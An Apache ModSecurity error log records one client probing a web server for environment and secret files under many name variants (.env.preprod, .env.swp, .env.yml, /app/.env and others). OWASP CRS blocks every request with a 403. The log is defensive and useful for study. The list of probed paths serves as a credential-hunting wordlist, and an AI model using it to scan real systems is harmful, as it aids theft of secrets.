[Mon May 11 18:06:39.549053 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-j4W8yzYoWG_eyCW6VwAAAUg"]
[Mon May 11 18:06:39.833933 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.preprod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.preprod"] [unique_id "agH-j4W8yzYoWG_eyCW6WQAAAUg"]
[Mon May 11 18:06:39.834188 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.preprod"] [unique_id "agH-j4W8yzYoWG_eyCW6WQAAAUg"]
[Mon May 11 18:06:39.834531 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-j4W8yzYoWG_eyCW6WQAAAUg"]
[Mon May 11 18:06:40.167766 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.uat"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.uat"] [unique_id "agH-kIW8yzYoWG_eyCW6WgAAAUg"]
[Mon May 11 18:06:40.168022 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.uat"] [unique_id "agH-kIW8yzYoWG_eyCW6WgAAAUg"]
[Mon May 11 18:06:40.168403 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-kIW8yzYoWG_eyCW6WgAAAUg"]
[Mon May 11 18:06:40.443004 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.dist"] [unique_id "agH-kIW8yzYoWG_eyCW6WwAAAUg"]
[Mon May 11 18:06:40.443240 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.dist"] [unique_id "agH-kIW8yzYoWG_eyCW6WwAAAUg"]
[Mon May 11 18:06:40.443515 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-kIW8yzYoWG_eyCW6WwAAAUg"]
[Mon May 11 18:06:40.700888 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.swp"] [unique_id "agH-kIW8yzYoWG_eyCW6XQAAAUg"]
[Mon May 11 18:06:40.701116 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.swp"] [unique_id "agH-kIW8yzYoWG_eyCW6XQAAAUg"]
[Mon May 11 18:06:40.701493 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-kIW8yzYoWG_eyCW6XQAAAUg"]
[Mon May 11 18:06:40.958484 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env~"] [unique_id "agH-kIW8yzYoWG_eyCW6XwAAAUg"]
[Mon May 11 18:06:40.958702 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env~"] [unique_id "agH-kIW8yzYoWG_eyCW6XwAAAUg"]
[Mon May 11 18:06:40.958979 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-kIW8yzYoWG_eyCW6XwAAAUg"]
[Mon May 11 18:06:41.213590 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env1"] [unique_id "agH-kYW8yzYoWG_eyCW6YQAAAUg"]
[Mon May 11 18:06:41.213773 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env1"] [unique_id "agH-kYW8yzYoWG_eyCW6YQAAAUg"]
[Mon May 11 18:06:41.214040 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-kYW8yzYoWG_eyCW6YQAAAUg"]
[Mon May 11 18:06:41.524707 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env2"] [unique_id "agH-kYW8yzYoWG_eyCW6YwAAAUg"]
[Mon May 11 18:06:41.524931 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env2"] [unique_id "agH-kYW8yzYoWG_eyCW6YwAAAUg"]
[Mon May 11 18:06:41.525218 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-kYW8yzYoWG_eyCW6YwAAAUg"]
[Mon May 11 18:06:41.797216 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_copy"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env_copy"] [unique_id "agH-kYW8yzYoWG_eyCW6ZgAAAUg"]
[Mon May 11 18:06:41.797423 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env_copy"] [unique_id "agH-kYW8yzYoWG_eyCW6ZgAAAUg"]
[Mon May 11 18:06:41.797691 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-kYW8yzYoWG_eyCW6ZgAAAUg"]
[Mon May 11 18:06:42.062336 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.txt"] [unique_id "agH-koW8yzYoWG_eyCW6aAAAAUg"]
[Mon May 11 18:06:42.062552 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.txt"] [unique_id "agH-koW8yzYoWG_eyCW6aAAAAUg"]
[Mon May 11 18:06:42.062965 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-koW8yzYoWG_eyCW6aAAAAUg"]
[Mon May 11 18:06:42.401790 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.json"] [unique_id "agH-koW8yzYoWG_eyCW6aQAAAUg"]
[Mon May 11 18:06:42.402010 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.json"] [unique_id "agH-koW8yzYoWG_eyCW6aQAAAUg"]
[Mon May 11 18:06:42.402320 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-koW8yzYoWG_eyCW6aQAAAUg"]
[Mon May 11 18:06:42.677483 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.yaml"] [unique_id "agH-koW8yzYoWG_eyCW6agAAAUg"]
[Mon May 11 18:06:42.677709 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.yaml"] [unique_id "agH-koW8yzYoWG_eyCW6agAAAUg"]
[Mon May 11 18:06:42.677984 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-koW8yzYoWG_eyCW6agAAAUg"]
[Mon May 11 18:06:42.963559 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.yml"] [unique_id "agH-koW8yzYoWG_eyCW6awAAAUg"]
[Mon May 11 18:06:42.963785 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.yml"] [unique_id "agH-koW8yzYoWG_eyCW6awAAAUg"]
[Mon May 11 18:06:42.964080 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-koW8yzYoWG_eyCW6awAAAUg"]
[Mon May 11 18:06:43.236757 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/app/.env"] [unique_id "agH-k4W8yzYoWG_eyCW6bAAAAUg"]
[Mon May 11 18:06:43.236983 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/app/.env"] [unique_id "agH-k4W8yzYoWG_eyCW6bAAAAUg"]
[Mon May 11 18:06:43.237289 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-k4W8yzYoWG_eyCW6bAAAAUg"]
